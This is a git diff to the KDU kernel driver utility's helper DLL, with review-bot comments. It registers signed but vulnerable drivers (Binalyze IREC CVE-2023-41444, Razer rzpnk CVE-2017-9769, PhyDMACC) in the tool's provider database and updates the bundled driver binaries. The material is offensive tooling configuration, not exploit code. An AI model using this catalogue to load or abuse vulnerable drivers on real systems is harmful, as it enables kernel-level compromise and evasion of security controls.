Binary files a/Source/Tanikaze/drv/lha.bin and b/Source/Tanikaze/drv/lha.bin differ
diff --git a/Source/Tanikaze/drv/mimidrv.bin b/Source/Tanikaze/drv/mimidrv.bin
index c81e5f3..d2308f3 100644
Binary files a/Source/Tanikaze/drv/mimidrv.bin and b/Source/Tanikaze/drv/mimidrv.bin differ
diff --git a/Source/Tanikaze/drv/nvoclock.bin b/Source/Tanikaze/drv/nvoclock.bin
index cf977b0..bc7076f 100644
Binary files a/Source/Tanikaze/drv/nvoclock.bin and b/Source/Tanikaze/drv/nvoclock.bin differ
diff --git a/Source/Tanikaze/drv/pcdsrvc_x64.bin b/Source/Tanikaze/drv/pcdsrvc_x64.bin
index 57cdc86..b7e78b4 100644
Binary files a/Source/Tanikaze/drv/pcdsrvc_x64.bin and b/Source/Tanikaze/drv/pcdsrvc_x64.bin differ
diff --git a/Source/Tanikaze/drv/physmem.bin b/Source/Tanikaze/drv/physmem.bin
index d9fc103..330fae9 100644
Binary files a/Source/Tanikaze/drv/physmem.bin and b/Source/Tanikaze/drv/physmem.bin differ
diff --git a/Source/Tanikaze/drv/procexp1627.bin b/Source/Tanikaze/drv/procexp1627.bin
index 0d10956..5e3df8c 100644
Binary files a/Source/Tanikaze/drv/procexp1627.bin and b/Source/Tanikaze/drv/procexp1627.bin differ
diff --git a/Source/Tanikaze/drv/procexp1702.bin b/Source/Tanikaze/drv/procexp1702.bin
index c030bd6..742815e 100644
Binary files a/Source/Tanikaze/drv/procexp1702.bin and b/Source/Tanikaze/drv/procexp1702.bin differ
diff --git a/Source/Tanikaze/drv/rtkio64.bin b/Source/Tanikaze/drv/rtkio64.bin
index 28fb4b3..add34f4 100644
Binary files a/Source/Tanikaze/drv/rtkio64.bin and b/Source/Tanikaze/drv/rtkio64.bin differ
diff --git a/Source/Tanikaze/drv/rzpnk.bin b/Source/Tanikaze/drv/rzpnk.bin
new file mode 100644
index 0000000..29d8485
Binary files /dev/null and b/Source/Tanikaze/drv/rzpnk.bin differ
diff --git a/Source/Tanikaze/resource.h b/Source/Tanikaze/resource.h
index 3901d78..cc5ea45 100644
--- a/Source/Tanikaze/resource.h
+++ b/Source/Tanikaze/resource.h
@@ -3,6 +3,7 @@
// Used by resource.rc
//
#define IDR_INTEL_NAL 103
+#define IDR_RZPNK 104
#define IDR_RTCORE64 105
#define IDR_GDRV 106
#define IDR_ATSZIO64 107
@@ -40,8 +41,10 @@
#define IDR_KEXPLORE 139
#define IDR_KOBJEXP 140
#define IDR_KREGEXP 141
+#define IDR_PHYDMACC 142
#define IDR_ECHODRV 143
#define IDR_NVOCLOCK 144
+#define IDR_IREC 145
#define IDR_DATA_DBUTILCAT 1000
#define IDR_DATA_DBUTILINF 1001
#define IDR_DATA_KMUEXE 1002
@@ -54,7 +57,7 @@
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 145
+#define _APS_NEXT_RESOURCE_VALUE 147
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1007
#define _APS_NEXT_SYMED_VALUE 101
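Review bot: `_APS_NEXT_RESOURCE_VALUE` is bumped to 147 although the highest resource ID this commit introduces is `IDR_IREC 145`, so by the convention the file itself follows (the old value 145 was one past `IDR_NVOCLOCK 144`) the next free value is 146. This is harmless, since the value only seeds the resource editor, but it leaves 146 unused while the same commit appears to fill the gaps 104 and 142 with `IDR_RZPNK` and `IDR_PHYDMACC`. `#define _APS_NEXT_RESOURCE_VALUE 146` would keep the numbering consistent.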
diff --git a/Source/Tanikaze/resource.rc b/Source/Tanikaze/resource.rc
index 9841f95..b322bad 100644
--- a/Source/Tanikaze/resource.rc
+++ b/Source/Tanikaze/resource.rc
@@ -144,6 +144,12 @@ IDR_ECHODRV RCDATA "drv\\echo_driver.bin"
IDR_NVOCLOCK RCDATA "drv\\nvoclock.bin"
+IDR_IREC RCDATA "drv\\irec.bin"
+
+IDR_PHYDMACC RCDATA "drv\\PhyDMACC.bin"
+
+IDR_RZPNK RCDATA "drv\\rzpnk.bin"
+
/////////////////////////////////////////////////////////////////////////////
//
@@ -151,8 +157,8 @@ IDR_NVOCLOCK RCDATA "drv\\nvoclock.bin"
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,1,7,2309
- PRODUCTVERSION 1,1,7,2309
+ FILEVERSION 1,1,8,2310
+ PRODUCTVERSION 1,1,8,2310
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -169,12 +175,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility Database"
- VALUE "FileVersion", "1.1.7.2309"
+ VALUE "FileVersion", "1.1.8.2310"
VALUE "InternalName", "Tanikaze.dll"
VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project"
VALUE "OriginalFilename", "Tanikaze.dll"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.1.7.2309"
+ VALUE "ProductVersion", "1.1.8.2310"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Tanikaze/tanikaze.h b/Source/Tanikaze/tanikaze.h
index 1ecc07c..6305e51 100644
--- a/Source/Tanikaze/tanikaze.h
+++ b/Source/Tanikaze/tanikaze.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 1.17
+* VERSION: 1.18
*
-* DATE: 16 Sep 2023
+* DATE: 21 Oct 2023
*
* Tanikaze helper dll (part of KDU project).
*
@@ -302,7 +302,7 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_PROVIDER_KPH,
KDU_VICTIM_DEFAULT,
SourceBaseNone,
- KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
+ KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"KProcessHacker",
(LPWSTR)L"KProcessHacker",
@@ -317,7 +317,7 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_PROVIDER_PROCEXP,
KDU_VICTIM_PE1627,
SourceBaseNone,
- KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_NO_VICTIM,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_NO_VICTIM | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)PROCEXP1627_DESC,
(LPWSTR)PROCEXP152,
@@ -347,7 +347,7 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_PROVIDER_DBK64,
KDU_VICTIM_DEFAULT,
SourceBaseNone,
- KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_NO_VICTIM,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_NO_VICTIM | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
KDUPROV_SC_V4,
(LPWSTR)L"Cheat Engine Dbk64",
(LPWSTR)L"CEDRIVER73",
@@ -407,7 +407,7 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_PROVIDER_ZEMANA,
KDU_VICTIM_PE1702,
SourceBaseNone,
- KDUPROV_FLAGS_SIGNATURE_WHQL,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
KDUPROV_SC_V4,
(LPWSTR)L"Zemana (CVE-2021-31728, CVE-2022-42045)",
(LPWSTR)L"ZemanaAntimalware",
@@ -617,7 +617,7 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_PROVIDER_ECHODRV,
KDU_VICTIM_PE1702,
SourceBaseNone,
- KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PREFER_VIRTUAL,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PREFER_VIRTUAL | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Echo AntiCheat",
(LPWSTR)L"EchoDrv",
@@ -638,6 +638,51 @@ KDU_DB_ENTRY gProvEntry[] = {
(LPWSTR)L"nvoclock",
(LPWSTR)L"NVR0Internal",
(LPWSTR)L"NVIDIA Corporation"
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_IREC,
+ KDU_PROVIDER_BINALYZE_IREC,
+ KDU_VICTIM_DEFAULT,
+ SourceBaseNone,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_VICTIM | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
+ KDUPROV_SC_NONE,
+ (LPWSTR)L"Binalyze CVE-2023-41444",
+ (LPWSTR)L"IREC",
+ (LPWSTR)L"IREC",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_PHYDMACC,
+ KDU_PROVIDER_PHYDMACC,
+ KDU_VICTIM_PE1702,
+ SourceBaseWinRing0,
+ KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE,
+ KDUPROV_SC_ALL_DEFAULT,
+ (LPWSTR)L"SLIC ToolKit",
+ (LPWSTR)L"PhyDMACC",
+ (LPWSTR)L"PhyDMACC_1_2_0",
+ (LPWSTR)L"Suzhou Ind. Park ShiSuanKeJi Co., Ltd."
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_RZPNK,
+ KDU_PROVIDER_RAZER,
+ KDU_VICTIM_DEFAULT,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NO_VICTIM | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
+ KDUPROV_SC_NONE,
+ (LPWSTR)L"Razer Overlay Support driver CVE-2017-9769",
+ (LPWSTR)L"rzpnk",
+ (LPWSTR)L"47CD78C9-64C3-47C2-B80F-677B887CF095",
+ (LPWSTR)L"Razer USA Ltd."
}
};
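Review bot: The three new `gProvEntry` records carry no comment explaining why IREC and rzpnk are registered with `KDUPROV_SC_NONE` while PhyDMACC gets `KDUPROV_SC_ALL_DEFAULT`, and the flag combinations are the only hint: the two shellcode-less entries are also the two that set `KDUPROV_FLAGS_OPENPROCESS_SUPPORTED`, which presumably means they exist only for the process-handle commands (`-ps`/`-dmp` in the README hunk) and are not usable by `-map`. A one-line comment above each such record, e.g. `// No shellcode support: usable only via the KDUPROV_FLAGS_OPENPROCESS_SUPPORTED path.`, would save the next maintainer from reconstructing that from the flags. Both entries also claim the full `KDU_MIN_NTBUILDNUMBER`..`KDU_MAX_NTBUILDNUMBER` range, which the hunk does not justify; if the drivers were only verified on particular builds, narrowing the range keeps `-list` honest. The description strings are also inconsistent with the existing `Zemana (CVE-2021-31728, CVE-2022-42045)` form; `L"Binalyze IREC (CVE-2023-41444)"` would match it. The enclosing `gProvEntry[]` initializer starts outside this hunk.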